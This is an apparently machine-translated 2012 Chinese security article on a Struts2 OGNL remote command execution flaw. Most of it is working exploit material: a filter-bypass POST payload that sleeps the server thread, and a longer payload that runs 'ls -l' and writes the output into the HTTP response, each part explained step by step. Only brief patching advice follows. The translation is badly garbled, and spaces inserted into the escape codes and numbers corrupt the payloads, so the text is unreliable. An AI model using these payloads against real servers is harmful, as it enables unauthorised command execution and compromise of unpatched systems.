Struts2 remote command execution vulnerability analysis and prevention-vulnerability and early warning-the black bar safety net

ID MYHACK58:62201234272
Type myhack58
Reporter 佚名
Modified 2012-07-08T00:00:00


Struts 2 is the struts and WebWork technology based on a merge of the new framework. Its brand new Struts 2 architecture and Struts 1 architecture the difference is huge. Struts 2 with WebWork as the core, using the interceptor mechanism to deal with user's request, such design also makes the business logic controller to communicate with the Servlet API completely from the opening, so Struts 2 can be understood as the WebWork of update product.

Recent Struts2 outbreak of a remote command execution vulnerability,knowing that the tick of the children's shoes should be aware of its dangers and the hot degree,the various versions of the exploit tool allows CNVD very painless. Posted below the tick livers greatly for this vulnerability analysis.

To POST way to submit the bypass to the input parameters of the portion of the filter.

('\43_memberAccess. allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork. MethodAccessor. denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(d)(('@java.lang.Thread@sleep(8 0 0 0)')(d))

The current thread sleep 8S

Command execution is mainly through ognl object in the context of the built-in static functions to perform.

As@Runtime@getRuntime(). exec

@class@method access a static method

xwork of ognl statement execution, the variable must be a#, before the adoption of\0 0 2 3 (1 6-ary#) to bypass official patch shield this but you can use\4 3(8-ary#)to bypass.

Implemented an interactive shell.

('\43_memberAccess. allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork. MethodAccessor. denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\7 5\'ls\4 0\u002dl\")(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime(). exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java. io. DataInputStream(\43myret. getInputStream())')(d))&(j)(('\43myres\75new\40byte[5 1 0 2 0]')(d))&(k)(('\43mydat. readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java. lang. String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout. getWriter(). println(\43mystr)')(d))

\7 5 (=8-ary)\4 0, the spaces 8 into the system ongl statement executed in the parameter does not allow spaces. Of course, including other

The old version of the regular expression^#=:are not allowed, pass to kill then is to use a\4 0 instead.

So the above is the

  1. Set the context denyMethodExecution=false to run the method implementation

2.excludeProperties=@java.util.Collections@EMPTY_SET (@class@call static variables

Set the external interceptor is empty

  1. mycmd=“ls-l” is defined, we execute the command variables

4.myret=@java.lang.Runtime@getRuntime(). exec(\43mycmd)') (calls a static method of the implementation of our variable)

  1. mydat=new java. io. DataInputStream(\43myret. getInputStream())') gets the input stream (post)

  2. myres=new data[5 1 0 2 0];mydat. readfully(myres); read the input stream

(5,6 in order to convert the input stream type)

  1. mystr=new java. lang. String(#myres) ;definition and assignment of the input stream

8.myout=org.apache.struts2.ServletActionContext@getResponse() ;get the repsonse data

  1. myout. getWriter(). println(#mystr) ;put the response data is printed to the screen.

In addition then posted about tick on the struts2 vulnerability discussion posts Url:http://zone. tick. org/content/2 0 0

livers greatly blog:http://livers. sinaapp. com/

Struts2 vulnerability repair solutions:

Download the latest version 2. 3. 4: The

Or modify the corresponding jar in the ongl processing logic,and then compile the package to replace the old file.

waf or the like, the security points will only keep alphanumeric, all other remove